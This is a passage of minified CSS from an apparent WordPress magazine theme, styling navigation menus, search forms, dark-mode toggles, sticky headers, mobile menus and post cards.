4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .mega-hierarchical .mega-dropdown-inner { display: grid; padding: 20px 0 30px 0; grid-template-columns: 4fr 4fr 3fr; } .mega-hierarchical .p-list-small-1 { --bottom-spacing: 10px; } .mega-col { padding-right: 25px; padding-left: 25px; } .mega-col-intro { display: flex; flex-flow: column nowrap; justify-content: space-between; } .mega-col-intro > *:not(:last-child) { margin-bottom: 20px; } .mega-col-intro .category-hero-wrap { max-width: 90%; } .mega-header:not(.mega-header-fw) i { width: 1em; margin-right: 5px; color: var(--g-color); } .mega-hierarchical .p-list-small-2 .feat-holder { width: 125px; } .mega-col .p-wrap:last-child { margin-bottom: 0; } .block-follow.rb-columns > .block-inner { align-items: stretch; } .cbox-description { font-size: var(--rem-mini); } .cbox-description * { font-size: inherit; } .main-menu-wrap { display: flex; align-items: center; height: 100%; } .menu-item a > span { font-size: inherit; font-weight: inherit; font-style: inherit; position: relative; letter-spacing: inherit; } .main-menu > li > a { position: relative; display: flex; display: -webkit-flex; align-items: center; flex-wrap: nowrap; height: var(--nav-height); padding-right: var(--menu-item-spacing, 12px); padding-left: var(--menu-item-spacing, 12px); white-space: nowrap; color: var(--nav-color); } .main-menu > li > a .menu-sub-title { position: relative; left: auto; vertical-align: top; } .main-menu .sub-menu { padding: 10px 0; background: var(--subnav-bg); background: -webkit-linear-gradient(left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .menu-ani-1 .main-menu .sub-menu > .menu-item a { -webkit-transition: background .25s var(--timing), border-color .25s var(--timing); transition: background .25s var(--timing), border-color .25s var(--timing); border-left: 3px solid transparent; } .menu-ani-1 .main-menu .sub-menu > .menu-item a:hover { border-color: var(--subnav-color-h, var(--g-color)); background-color: var(--flex-gray-7); } .sub-menu > .menu-item a, .user-dropdown a { display: flex; align-items: center; width: 100%; padding: 7px 20px; } .sub-menu > .menu-item a span, .user-dropdown a, .more-section a, .elementor-widget-container .menu a { -webkit-transition: var(--effect); transition: var(--effect); } .more-section a:hover, .sub-menu > .menu-item a:hover > span, .user-dropdown a:hover, .elementor-widget-container .menu a:hover { color: var(--subnav-color-h, var(--g-color)); } .large-menu > .menu-item.menu-item-has-children > a > span { padding-right: 2px; } .large-menu > .menu-item.menu-item-has-children > a:after, .logged-welcome:after { font-family: 'ruby-icon'; font-size: var(--rem-mini); line-height: 1; content: '\e924'; -webkit-transition: -webkit-transform .25s var(--timing), color .25s var(--timing); transition: transform .25s var(--timing), color .25s var(--timing); will-change: transform; } .large-menu > .menu-item.menu-item-has-children:hover > a:after, .header-dropdown-outer.dropdown-activated .logged-welcome:after { -webkit-transform: rotate(-180deg); transform: rotate(-180deg); } .large-menu .sub-menu .menu-item.menu-item-has-children > a:after { font-family: 'ruby-icon'; font-size: var(--meta-fsize); line-height: 1; margin-right: 0; margin-left: auto; content: '\e926'; } body.rtl .large-menu .sub-menu .menu-item.menu-item-has-children > a:after { /*rtl:ignore*/ display: inline-block; /*rtl:ignore*/ -webkit-transform: scale(-1, 1); /*rtl:ignore*/ transform: scale(-1, 1); /*rtl:ignore*/ -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } span.menu-sub-title { line-height: 1; position: absolute; top: 0; left: 100%; margin-left: 7px; padding: 2px 5px; white-space: nowrap; color: var(--subnav-color); border-radius: var(--round-3); background-color: var(--flex-gray-15); } .rb-menu > li > a .menu-sub-title { color: var(--nav-color); } .widget_nav_menu .menu-sub-title, .sidebar-menu .menu-sub-title { margin-top: -5px; margin-left: 5px; } .wnav-holder { padding-right: 5px; padding-left: 5px; } .wnav-holder svg { width: 20px; height: 20px; } .wnav-svg { line-height: 0; width: 20px; } [data-theme='dark'] .wnav-svg, [data-theme='dark'] .search-icon-svg img, .light-scheme .search-icon-svg img, body:not(.sticky-on) .header-transparent .navbar-right .wnav-svg { filter: invert(1); } .wnav-icon { font-size: 20px; } .widget-h-login.header-dropdown-outer { position: relative; } .widget-h-login .user-dropdown { right: auto; left: auto; } .logged-user-menu { padding-top: 10px; padding-bottom: 10px; } .widget-h-login .logout-url { color: var(--absolute-white) !important; background-color: var(--dark-accent); } .widget-h-login .logout-url:hover { background-color: var(--g-color); } .widget-h-login .logout-url svg { width: 14px; height: 14px; margin-right: 0; margin-left: auto; } body.rtl .widget-h-login .logout-url svg { /*rtl:ignore*/ display: inline-block; /*rtl:ignore*/ -webkit-transform: scale(-1, 1); /*rtl:ignore*/ transform: scale(-1, 1); /*rtl:ignore*/ -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } .widget-p-listing .p-wrap { margin-bottom: 20px; } .widget-p-listing .p-wrap:last-child { margin-bottom: 0; } .sidebar-wrap .ad-wrap { padding-right: 0; padding-left: 0; } .w-header-search .header-search-form { width: 340px; max-width: 100%; margin-bottom: 0; padding: 5px; } .w-header-search .header-popup { right: 0; left: auto; } .w-header-search .search-form-inner { border: none; } .rb-search-form { position: relative; width: 100%; } .rb-search-submit { position: relative; display: flex; } .rb-search-submit input[type='submit'] { padding: 0; opacity: 0; } .rb-search-submit i { font-size: var(--em-small); line-height: 1; position: absolute; top: 0; bottom: 0; left: 0; display: flex; align-items: center; justify-content: center; width: 100%; -webkit-transition: var(--effect); transition: var(--effect); pointer-events: none; } .rb-search-form .search-icon { display: flex; flex-shrink: 0; justify-content: center; width: 40px; } .search-icon.search-icon-svg img, .search-icon svg { width: 20px; } .rb-search-submit:hover i { color: var(--g-color) } .search-form-inner { display: flex; align-items: center; border: 1px solid var(--flex-gray-15); border-radius: var(--round-5); } .header-wrap .search-form-inner { border-color: var(--subnav-color-10); } .mobile-collapse .search-form-inner { border-color: var(--submbnav-color-10, var(--flex-gray-15)); } .rb-search-form .search-text { flex-grow: 1; } .rb-search-form input { width: 100%; padding-right: 0; padding-left: 0; border: none; background: none; } .rb-search-form input::placeholder { opacity: .8; color: inherit; } img.svg { width: 100%; height: 100%; object-fit: contain; } .navbar-right { position: relative; flex-shrink: 0; } .header-dropdown-outer { position: static; } .dropdown-trigger { cursor: pointer; } .header-dropdown { right: 0; left: auto; overflow: hidden; min-width: 200px; background: var(--subnav-bg); background: -webkit-linear-gradient(left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .menu-ani-1 .rb-menu > .menu-item > a > span:before { position: absolute; bottom: 0; left: 0; width: 0; height: 3px; content: ''; -webkit-transition: width 0s var(--timing), background-color .25s var(--timing); transition: width 0s var(--timing), background-color .25s var(--timing); background-color: transparent; } .menu-ani-1 .rb-menu > .menu-item > a > span:after { position: absolute; right: 0; bottom: 0; width: 0; height: 3px; content: ''; -webkit-transition: width .25s var(--timing); transition: width .25s var(--timing); background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item.current-menu-item > a > span:before { width: 100%; background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item > a:hover > span, .menu-ani-1 .rb-menu > .menu-item > a:hover:after { color: var(--nav-color-h, inherit); } .menu-ani-2 .rb-menu > .menu-item > a > span { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .menu-ani-2 .rb-menu > .menu-item > a:hover > span { opacity: .7; } .menu-ani-1 .rb-menu > .menu-item > a:hover > span:before { width: 100%; -webkit-transition: width .25s var(--timing); transition: width .25s var(--timing); background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item > a:hover > span:after, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span:after { width: 100%; -webkit-transition: width 0s var(--timing); transition: width 0s var(--timing); background-color: transparent; } .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover:after { color: var(--transparent-nav-color-hover, inherit); } .menu-ani-1 .header-transparent .rb-menu > .menu-item > a > span:after, .menu-ani-1 .header-transparent .rb-menu > .menu-item.current-menu-item > a > span:before, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span:before { background-color: var(--transparent-nav-color-h-accent, var(--nav-color-h-accent, var(--g-color))); } .menu-item-icon { display: inline-flex; margin-right: 4px; } .menu-item-icon .icon-svg { flex-shrink: 0; width: 1em; } .burger-icon { position: relative; display: block; width: 24px; height: 16px; color: var(--nav-color, inherit); } .burger-icon > span { position: absolute; left: 0; display: block; height: 2px; -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); border-radius: 2px; background-color: currentColor; } .collapse-activated .burger-icon > span { -webkit-transition: var(--effect); transition: var(--effect); } .burger-icon > span:nth-child(1) { top: 0; width: 100%; } .burger-icon > span:nth-child(2) { top: 50%; width: 65%; margin-top: -1px; } .burger-icon > span:nth-child(3) { top: auto; bottom: 0; width: 40%; } .collapse-activated .burger-icon > span:nth-child(2) { background-color: transparent; } .collapse-activated .burger-icon > span:nth-child(1) { top: 50%; width: 100%; margin-top: -1px; -webkit-transform: rotate(45deg); transform: rotate(45deg); transform-origin: center center; } .collapse-activated .burger-icon > span:nth-child(3) { top: 50%; width: 100%; margin-top: -1px; -webkit-transform: rotate(-45deg); transform: rotate(-45deg); transform-origin: center center; } .login-toggle { display: inline-flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; } .login-toggle.is-btn { line-height: 30px; margin-right: 10px; padding: 0 20px; } .login-toggle span { font-size: var(--rem-mini); } .logged-welcome { font-size: var(--rem-mini); display: none; align-items: center; margin-left: 5px; } .logged-welcome:after { line-height: 1; display: inline-flex; } .logged-welcome strong { font-style: normal; margin-right: 2px; margin-left: 2px; } .logged-avatar img { width: 1.75em; border-radius: 100%; } .notification-icon { display: flex; } .notification-icon-inner { display: flex; align-items: center; } .notification-icon-inner .rbi-notification { position: relative; } .notification-info { position: absolute; top: -3px; right: -3px; width: 14px; height: 14px; text-align: center; opacity: 0; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } @-webkit-keyframes heartbeat { 0% { transform: scale(1); } 50% { transform: scale(.75); } 100% { transform: scale(1); } } @keyframes heartbeat { 0% { transform: scale(1); } 50% { transform: scale(.75); } 100% { transform: scale(1); } } .notification-activated .notification-info { -webkit-animation: heartbeat 1s infinite; animation: heartbeat 1s infinite; opacity: 1; } .notification-popup { display: block; width: 360px; max-width: 100%; } .notification-header { display: flex; align-items: center; padding: 10px 15px; background-color: var(--flex-gray-7); } .notification-latest { margin-bottom: 35px; } .notification-url { display: flex; align-items: center; flex-flow: row nowrap; margin-left: auto; -webkit-transition: var(--effect); transition: var(--effect); opacity: .7; } .notification-url:hover { opacity: 1; } .notification-url i { margin-left: 4px; } .notification-content .scroll-holder { overflow-y: scroll; max-height: 50vh; } .notification-content .p-wrap { margin-bottom: 0; padding: 10px 15px; } .notification-content-title { display: flex; align-items: center; flex-flow: nowrap; margin: 10px 15px; padding-bottom: 5px; border-bottom: 1px solid var(--flex-gray-15); } .notification-content-title i { margin-right: 4px; color: var(--g-color); } .notification-content .loadmore-trigger span { font-size: var(--rem-mini); line-height: 2em; margin-top: 15px; padding: 0 30px; } .menu-has-child-mega-columns { position: relative; display: flex; align-items: center; cursor: pointer; } .more-trigger { line-height: 0; height: 100%; -webkit-transition: var(--effect); transition: var(--effect); color: var(--nav-color); } .more-section-outer .svg-icon { width: 1em; } .more-section-outer .more-trigger { padding-right: var(--menu-item-spacing, 12px); padding-left: var(--menu-item-spacing, 12px); } .more-section-outer .more-trigger:hover, .more-section-outer.dropdown-activated .more-trigger { color: var(--g-color); } .dots-icon { display: flex; align-items: center; flex-flow: column nowrap; justify-content: space-between; height: 18px; -webkit-transition: var(--effect); transition: var(--effect); } .more-trigger:hover .dots-icon, .dropdown-activated .dots-icon { height: 22px; } .dots-icon > span { display: block; width: 4px; height: 4px; border-radius: 200%; background-color: currentColor; } .more-content { padding: 30px 20px 10px 20px; } .collapse-footer { padding: 15px; background-color: var(--subnav-color-10); } .mega-columns { display: grid; margin-right: -20px; margin-left: -20px; grid-template-columns: 1fr 1fr; } .mega-columns > * { padding-right: 20px; padding-left: 20px; } .menu-has-child-mega-columns.layout-col-1 .mega-columns { grid-template-columns: 1fr; } .menu-has-child-mega-columns.layout-col-3 .mega-columns { grid-template-columns: 1fr 1fr 1fr; } .menu-has-child-mega-columns.layout-col-4 .mega-columns { grid-template-columns: 1fr 1fr 1fr 1fr; } .menu-has-child-mega-columns.layout-col-5 .mega-columns { grid-template-columns: 1fr 1fr 1fr 1fr 1fr; } .more-section .header-search-form { min-width: 320px; margin-bottom: 25px; } .more-col { min-width: 170px; margin-bottom: 20px; padding-right: 20px; padding-left: 20px; } .more-col .widget-heading, .elementor-widget-wp-widget-nav_menu h5 { font-size: var(--h4-fsize); display: block; margin-bottom: 7px; } .header-search-form { margin-bottom: 20px; } .header-search-form .h5 { display: block; margin-bottom: 10px; } .live-search-form-outer { position: relative; } .live-search-absolute { position: absolute; z-index: 1000; top: 100%; right: 0; left: 0; color: var(--body-color); border-radius: var(--round-5); background-color: var(--solid-white); } .more-content .live-search-absolute { color: var(--subnav-color); background: var(--subnav-bg); background: -webkit-linear-gradient(left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); } .live-search-animation.rb-loader { position: absolute; top: 15px; right: 10px; width: 20px; height: 20px; opacity: 0; color: inherit; } .live-search-link .is-btn { padding: 7px 25px; } .live-search-link .is-btn:hover { color: var(--absolute-white); } .live-search-response-inner { position: relative; margin: 0 15px 15px 15px; padding-top: 20px; } .live-search-response-inner:before { position: absolute; top: 5px; right: 0; left: 0; display: block; width: 100%; content: ''; border-top: 2px solid var(--flex-gray-15); } .live-search-absolute .live-search-response-inner:before { border-top: none; } .live-search-no-result { font-size: var(--rem-mini); opacity: .5; } .live-search-response .p-list-small-2 .feat-holder { width: 80px; } .live-search-link { text-align: center; } .search-loading .live-search-animation.rb-loader { display: block; opacity: 1; } .search-loading .rb-search-submit i { display: none; } .collapse-footer > * { margin-bottom: 12px; } .collapse-footer > *:last-child { margin-bottom: 0; } .collapse-footer-menu-inner { display: flex; flex-flow: row wrap; } .collapse-footer-menu-inner li { position: relative; display: flex; align-items: center; flex-flow: row nowrap; } .collapse-footer-menu-inner li:not(:last-child):after { display: flex; width: 3px; height: 3px; margin-right: 10px; margin-left: 10px; content: ''; opacity: .25; border-radius: 100%; background-color: currentColor; } .collapse-copyright { font-size: var(--rem-mini); opacity: .7; } .sub-menu.left-direction, .header-dropdown.left-direction { right: -10%; left: auto; } .sub-menu .sub-menu.left-direction { right: 100%; margin-right: 20px; } .large-menu .sub-menu li:hover > .sub-menu.left-direction { right: calc(100% - 1px); left: auto; margin-right: 0; } .dark-mode-toggle-wrap { height: auto; } .dark-mode-toggle { display: flex; align-items: center; cursor: pointer; } .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { position: relative; margin-left: 5px; padding-left: 10px; border-left: 1px solid var(--flex-gray-40); } .navbar-outer .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { border-color: var(--nav-color-10); } .dark-mode-slide { position: relative; width: 40px; height: 14px; border-radius: 20px; background-color: var(--flex-gray-15); } .dark-mode-slide-btn { position: absolute; top: -5px; left: 0; display: flex; visibility: hidden; align-items: center; justify-content: center; width: 24px; height: 24px; -webkit-transition: opacity .1s; transition: opacity .1s; opacity: 0; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--solid-white); -webkit-box-shadow: 0 1px 4px var(--shadow-12) !important; box-shadow: 0 1px 4px var(--shadow-12) !important; } .triggered .dark-mode-slide-btn { -webkit-transition: opacity .25s, transform .5s; transition: opacity .25s, transform .5s; will-change: transform; } .svg-mode-light { color: var(--body-fcolor); } .mode-icon-dark { color: #fff; background-color: var(--g-color); } .dark-mode-slide-btn svg { width: 14px; height: 14px; } .dark-mode-slide-btn.activated { visibility: visible; opacity: 1; } .mode-icon-dark:not(.activated), .mode-icon-default.activated { -webkit-transform: translateX(0px); transform: translateX(0px); } .mode-icon-default:not(.activated), .mode-icon-dark.activated { -webkit-transform: translateX(16px); transform: translateX(16px); } body.switch-smooth { -webkit-transition: background-color .25s var(--timing); transition: background-color .25s var(--timing); } .navbar-outer { position: relative; z-index: 110; display: block; width: 100%; } .elementor-editor-active .header-transparent { pointer-events: none; } .elementor-editor-active .navbar-outer { z-index: 0; } .is-mstick .navbar-outer { min-height: var(--nav-height); } .is-mstick .sticky-holder { position: absolute; z-index: 998; top: 0; left: 0; width: 100%; } .sticky-on .mobile-qview { display: none; } @-webkit-keyframes stick-animation { from { top: -100px; } to { top: 0; } } @keyframes stick-animation { from { top: -100px; } to { top: 0; } } @-webkit-keyframes unstick-animation { from { opacity: 1; } to { opacity: 0; } } @keyframes unstick-animation { from { opacity: 1; } to { opacity: 0; } } .sticky-on.is-mstick .sticky-holder, .sticky-on .e-section-sticky { position: fixed; top: 0; right: 0; left: 0; -webkit-animation-name: stick-animation; animation-name: stick-animation; -webkit-animation-duration: 300ms; animation-duration: 300ms; -webkit-animation-timing-function: ease-out; animation-timing-function: ease-out; -webkit-animation-iteration-count: 1; animation-iteration-count: 1; } .sticky-on.is-mstick.unstick-animated .sticky-holder, .sticky-on.unstick-animated .e-section-sticky { -webkit-animation-name: unstick-animation; animation-name: unstick-animation; -webkit-animation-duration: 150ms; animation-duration: 150ms; opacity: 0; } .e-section-sticky { z-index: 1000; } .collapse-activated, .collapse-activated body, .collapse-activated .sticky-holder, .collapse-activated .header-mobile { overflow: hidden; height: 100%; } .collapse-activated .site-outer { overflow: hidden; height: 100%; margin-top: 0 !important; -webkit-transition: none; transition: none; } .collapse-activated .header-wrap { display: flex; align-items: stretch; flex-flow: column nowrap; height: 100%; min-height: 100vh; } .collapse-activated .navbar-outer { flex-grow: 1; } .header-mobile-wrap { position: relative; z-index: 99; flex-grow: 0; flex-shrink: 0; color: var(--mbnav-color, var(--nav-color)); background: var(--mbnav-bg, var(--nav-bg)); background: -webkit-linear-gradient(left, var(--mbnav-bg-from, var(--nav-bg-from)) 0%, var(--mbnav-bg-to, var(--nav-bg-to)) 100%); background: linear-gradient(to right, var(--mbnav-bg-from, var(--nav-bg-from)) 0%, var(--mbnav-bg-to, var(--nav-bg-to)) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .header-mobile-wrap .is-text-logo .logo-title > *, .header-mobile-wrap .navbar-right > * { color: inherit; } .mobile-logo-wrap { display: flex; flex-grow: 0; } .mobile-logo-wrap img { width: auto; max-height: var(--mbnav-height, 42px); } #amp-header .navbar-left .mobile-logo-wrap img { object-position: left !important; } .header-mobile .logo-title a { line-height: var(--mbnav-height, 42px); } .mobile-collapse-holder { display: block; overflow-y: auto; width: 100%; } .mobile-collapse .header-search-form { margin-bottom: 15px; } .mobile-collapse .rb-search-form input { padding-left: 0; } .mbnav { display: flex; align-items: center; flex-flow: row nowrap; min-height: var(--mbnav-height, 42px); } .header-mobile-wrap .navbar-right { align-items: center; justify-content: flex-end; } .mbnav-center .navbar-left, .mbnav-center .navbar-right { flex-grow: 0; flex-shrink: 0; width: 30%; } .mbnav-center .navbar-center { display: flex; justify-content: center; width: 40%; } .mbnav-center .wnav-holder { padding-right: 3px; padding-left: 3px; } .mobile-toggle-wrap { display: flex; align-items: stretch; } .navbar-right .mobile-toggle-wrap { height: auto; } .navbar-right .mobile-toggle-wrap .burger-icon > span { right: 0; left: auto; } .navbar-right .mobile-toggle-wrap .mobile-menu-trigger { padding-right: 0; padding-left: 10px; } .mobile-menu-trigger { display: flex; align-items: center; padding-right: 10px; cursor: pointer; } .mobile-menu-trigger.mobile-search-icon { font-size: 18px; padding: 0 5px; } .mobile-menu-trigger i:before { -webkit-transition: var(--effect); transition: var(--effect); } .mobile-collapse { z-index: 0; display: flex; visibility: hidden; overflow: hidden; flex-grow: 1; height: 0; -webkit-transition: opacity .7s var(--timing); transition: opacity .7s var(--timing); opacity: 0; color: var(--submbnav-color, var(--subnav-color)); background: var(--submbnav-bg, var(--subnav-bg)); background: -webkit-linear-gradient(left, var(--submbnav-bg-from, var(--subnav-bg-from)) 0%, var(--submbnav-bg-to, var(--subnav-bg-to)) 100%); background: linear-gradient(to right, var(--submbnav-bg-from, var(--subnav-bg-from)) 0%, var(--submbnav-bg-to, var(--subnav-bg-to)) 100%); } .collapse-activated .mobile-collapse { visibility: visible; flex-grow: 1; height: auto; opacity: 1; } .mobile-collapse-sections { position: relative; max-width: 100%; margin-top: 20px; padding-top: 20px; } .mobile-collapse-inner { position: relative; display: block; width: 100%; padding-top: 15px; } .mobile-search-form .live-search-animation.rb-loader { top: 8px; } .mobile-menu > li.menu-item-has-children:not(:first-child) { margin-top: 20px; } .mobile-menu > li > a { display: block; padding: 10px 0; } .mobile-menu .sub-menu { display: flex; flex-flow: row wrap; padding-top: 5px; border-top: 1px solid var(--submbnav-color-10, var(--subnav-color-10)); } .mobile-menu .sub-menu > * { flex: 0 0 50%; } .mobile-menu .sub-menu a { display: block; width: 100%; padding: 7px 0; } .mobile-qview { position: relative; display: block; overflow: auto; width: 100%; border-top: 1px solid var(--nav-color-10); scrollbar-width: none; -ms-overflow-style: none; } .mobile-qview::-webkit-scrollbar { width: 0; height: 0; } .mobile-qview-inner { display: flex; flex-flow: row nowrap; } .mobile-qview a { line-height: 42px; position: relative; display: block; padding: 0 15px; white-space: nowrap; color: inherit; } .mobile-qview .menu-sub-title { display: none; } .mobile-qview a:before { position: absolute; right: 15px; bottom: 0; left: 15px; height: 4px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-3); background-color: transparent; } .mobile-qview a:hover:before, .mobile-qview .current-menu-item > a:before { background-color: var(--g-color); } .mobile-qview a > span { font-size: var(--em-small); } .mobile-collapse-sections > * { display: flex; flex-flow: row nowrap; margin-bottom: 20px; padding-bottom: 20px; border-bottom: 1px solid var(--flex-gray-15); } .mobile-collapse-sections > .mobile-social-list { align-items: center; flex-flow: row wrap; } .mobile-collapse-sections > *:last-child { margin-bottom: 0; border-bottom: none; } .mobile-login-title, .mobile-social-list-title { flex-grow: 1; } .mobile-social-list a { font-size: 16px; flex-shrink: 0; padding: 0 12px; } .header-alert { font-size: var(--em-mini); display: flex; align-items: center; justify-content: center; padding-top: 5px; padding-bottom: 5px; text-align: center; color: var(--alert-color, inherit); background-color: var(--alert-bg, #ffc96a); } .header-ad-widget { padding: 15px 20px; } .sticky-on .header-alert.is-sticky-hide { visibility: hidden; } .top-site-ad { position: fixed; top: 0; bottom: auto; left: 0; display: block; width: 100%; height: auto; text-align: center; background-color: var(--top-site-bg, var(--flex-gray-7)); } .top-site-ad:not(.no-spacing) { padding-top: 15px; padding-bottom: 15px; } .top-site-ad.no-spacing .edge-padding { padding-right: 0; padding-left: 0; } .top-site-ad .ad-image { border-radius: 0; } .yes-hd-transparent .top-site-ad { background-color: var(--top-site-bg, #141519); } .admin-bar .top-site-ad { top: 32px; } /* ----------------- 6 - Post Entry ----------------- */ .p-wrap { position: relative; margin-bottom: var(--bottom-spacing); } .p-overlay { --el-spacing: 10px; --bottom-spacing: 15px; } .p-small, .block-small .pagination-wrap { --el-spacing: 7px; --bottom-spacing: 25px; } .grid-box, .list-box { position: relative; padding: 0; border-radius: var(--wrap-border, var(--round-3)); } .grid-box .p-featured { -webkit-border-bottom-right-radius: 0; border-bottom-right-radius: 0; -webkit-border-bottom-left-radius: 0; border-bottom-left-radius: 0; } .grid-box { height: 100%; } .p-wrap > *:not(:last-child), .grid-box > *:not(:last-child), .p-content > *:not(:last-child) { margin-bottom: var(--el-spacing); } .box-border .grid-box:before, .box-border .list-box:before { position: absolute; z-index: 5; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; border: 1px solid; border-color: var(--box-color, var(--flex-gray-15)); border-radius: var(--round-3); } .box-bg .grid-box, .box-bg .list-box { background-color: var(--box-color, var(--solid-light)); } .box-shadow .grid-box, .box-shadow .list-box { -webkit-box-shadow: 0 4px 20px var(--shadow-7); box-shadow: 0 4px 20px var(--shadow-7); } [data-theme='dark'] .box-border .grid-box:after, .light-scheme .box-border .grid-box:after, [data-theme='dark'] .box-border .list-box:after, .light-scheme .box-border .list-box:after { border-color: var(--dark-box-color, var(--flex-gray-15)); } [data-theme='dark'] .box-bg .grid-box, .light-scheme .box-bg .grid-box, [data-theme='dark'] .box-bg .list-box, .light-scheme .box-bg .list-box { background-color: var(--dark-box-color, var(--solid-light)); } .grid-box .p-content { padding: var(--box-spacing); padding-top: 0; } .counter-el { counter-increment: trend-counter; pointer-events: none; } .counter-holder { display: flex; flex-flow: row nowrap; flex-grow: 1; pointer-events: auto; } .counter-el:before { font-family: var(--h2-family); font-weight: var(--h2-fweight); font-style: var(--h2-fstyle); line-height: 1.1; display: flex; min-width: 1.1em; margin-right: 15px; content: counter(trend-counter, decimal-leading-zero); letter-spacing: var(--h2-fspace); pointer-events: none; opacity: .35; } .counter-holder .counter-el:before { min-width: auto; } .p-list .counter-el { z-index: -1; } .feat-holder { position: relative; max-width: 100%; } .p-top { display: flex; align-items: stretch; flex-flow: row wrap; width: 100%; } .entry-format-relative .p-format { display: flex; align-items: center; justify-content: center; height: 100%; margin-left: 2px; padding: 0 5px; border-radius: var(--round-3); } .entry-format-relative .p-format .gallery-count { display: none; } .entry-format-relative .p-format i { font-size: 1em; } .p-featured { position: relative; display: block; overflow: hidden; padding-bottom: 60%; border-radius: var(--wrap-border, var(--round-3)); } .p-overlay .p-featured, .p-highlight .p-featured { border-radius: 0; } .p-overlay-2.p-middle .overlay-inner.p-gradient { background: none; } .p-featured.ratio-v1 { padding-bottom: 75%; } .p-featured.ratio-v2 { padding-bottom: 85%; } .p-featured.ratio-q { padding-bottom: 100%; } .preview-video { position: absolute; z-index: 2; top: 0; right: 0; bottom: 0; left: 0; display: none; overflow: inherit; width: 100%; height: 100%; pointer-events: none; object-fit: cover; } .preview-video video { display: block; width: 100%; height: 100%; pointer-events: none; object-fit: cover; } .show-preview .preview-video { display: block; } .p-flink { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .p-featured img.featured-img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; margin: 0; object-fit: cover; object-position: center; } .p-meta { position: relative; display: block; } .p-wrap:not(.p-center) .p-meta.has-bookmark, .p-wrap:not(.p-center) .review-meta.has-bookmark { padding-right: 25px; } .meta-inner { display: flex; align-items: center; flex-flow: row wrap; flex-grow: 1; } .rb-bookmark { font-size: 1rem; position: absolute; z-index: 10; top: auto; right: 0; bottom: 0; left: auto; display: flex; align-items: center; justify-content: center; width: 20px; height: 100%; cursor: pointer; color: var(--body-fcolor); } .bookmarked-icon, .bookmarked i:not(.bookmarked-icon) { display: none; } .bookmarked i.bookmarked-icon { display: block; } .rb-bookmark i { -webkit-transition: var(--effect); transition: var(--effect); } .rb-bookmark:hover { color: var(--g-color); text-shadow: 0 0 4px var(--g-color-90); } .rb-bookmark.in-progress { pointer-events: none; } .remove-bookmark { display: flex; align-items: center; flex-flow: row nowrap; padding-top: 7px; -webkit-transition: var(--effect); transition: var(--effect); border-top: 1px dashed var(--flex-gray-15); } .remove-bookmark:hover { color: var(--g-color); } .remove-bookmark svg { width: 1em; } .remove-bookmark span { margin-left: 4px; } .meta-el { display: inline-flex; align-items: center; flex-flow: row wrap; } .meta-category a { color: var(--cat-highlight, inherit); } .meta-el:first-child:before, .meta-el:first-of-type:before { display: none; } .meta-el i { margin-right: 5px; } .meta-el:not(.meta-author) a:after { display: inline-block; padding: 0 3px; content: '/'; text-decoration: none !important; letter-spacing: 0; opacity: .4; color: var(--body-fcolor); } .meta-el a:last-child:after { display: none; } .meta-avatar { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; margin-right: 5px; } body .meta-avatar img { display: inline-flex; width: 22px; height: 22px; border-radius: 100%; object-fit: cover; } .meta-avatar.multiple-meta-avatar img:not(:first-child) { margin-left: -12px; } .smeta-in > .meta-avatar.multiple-meta-avatar img:not(:first-child) { margin-left: 3px; } .co-author { display: inline-flex; align-items: center; } .co-authors .co-author:after { font-size: var(--em-mini); font-weight: normal; display: inline-flex; margin-right: 3px; margin-left: 3px; content: '/'; opacity: .5; } .co-authors .co-author:last-child:after { display: none; } span.entry-title { display: block; } .p-url { font-size: var(--title-size, inherit); text-underline-offset: 1px; } .sticky .entry-title a:before, .sticky .s-title:before { font-family: 'ruby-icon'; font-size: 1em; margin-right: .3em; padding: 0; content: '\e962' !important; color: inherit; background: none; } .meta-label { margin-right: .35em; } .meta-author { -webkit-transition: var(--effect); transition: var(--effect); } .is-meta .meta-author a, .meta-category a, .breadcrumb-inner a, .efoot a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration-line: underline; text-decoration-color: transparent; text-underline-offset: 1px; } .is-meta a:hover, .single-meta .meta-author a, .ubox .nname-info .nice-name, .sponsor-link:hover .is-text, .breadcrumb-inner a:hover, .efoot a:hover { text-decoration: underline; text-decoration-color: var(--g-color); } .single-meta .meta-author a:hover, a.nice-name:hover { color: var(--g-color) } .is-meta .meta-category a:hover { text-decoration-color: var(--cat-highlight, var(--g-color)); } .post-edit-link { font-size: var(--rem-mini); line-height: 1; position: absolute; z-index: 9999; top: 0; right: 